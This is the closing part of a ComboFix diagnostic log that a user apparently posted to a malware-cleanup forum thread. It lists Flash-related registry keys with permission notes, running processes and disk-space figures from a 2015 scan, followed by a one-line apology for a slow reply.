[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.17"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_17_0_0_188.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_17_0_0_188.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_17_0_0_188.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
------------------------ Other Running Processes ------------------------
.
c:\program files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
c:\program files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\windows\SysWOW64\PnkBstrA.exe
c:\program files (x86)\Malwarebytes Anti-Malware\mbam.exe
c:\program files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
c:\program files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
c:\program files (x86)\Common Files\Logishrd\LQCVFX\COCIManager.exe
c:\program files (x86)\HP\Digital Imaging\bin\hpqSTE08.exe
c:\program files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
c:\program files (x86)\HP\Digital Imaging\bin\hpqbam08.exe
c:\program files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
c:\program files (x86)\Adobe\Adobe Creative Cloud\HEX\Adobe CEF Helper.exe
c:\program files (x86)\Adobe\Adobe Creative Cloud\HEX\Adobe CEF Helper.exe
.
**************************************************************************
.
Completion time: 2015-06-28  19:35:12 - machine was rebooted
ComboFix-quarantined-files.txt  2015-06-28 23:35
.
Pre-Run: 403,042,234,368 bytes free
Post-Run: 417,521,885,184 bytes free
.
- - End Of File - - 5CCF21C8620633B42E0125960988EEB1
A36C5E4F47E84449FF07ED3517B43A31


Sorry it took so long to reply; I lost internet connection.





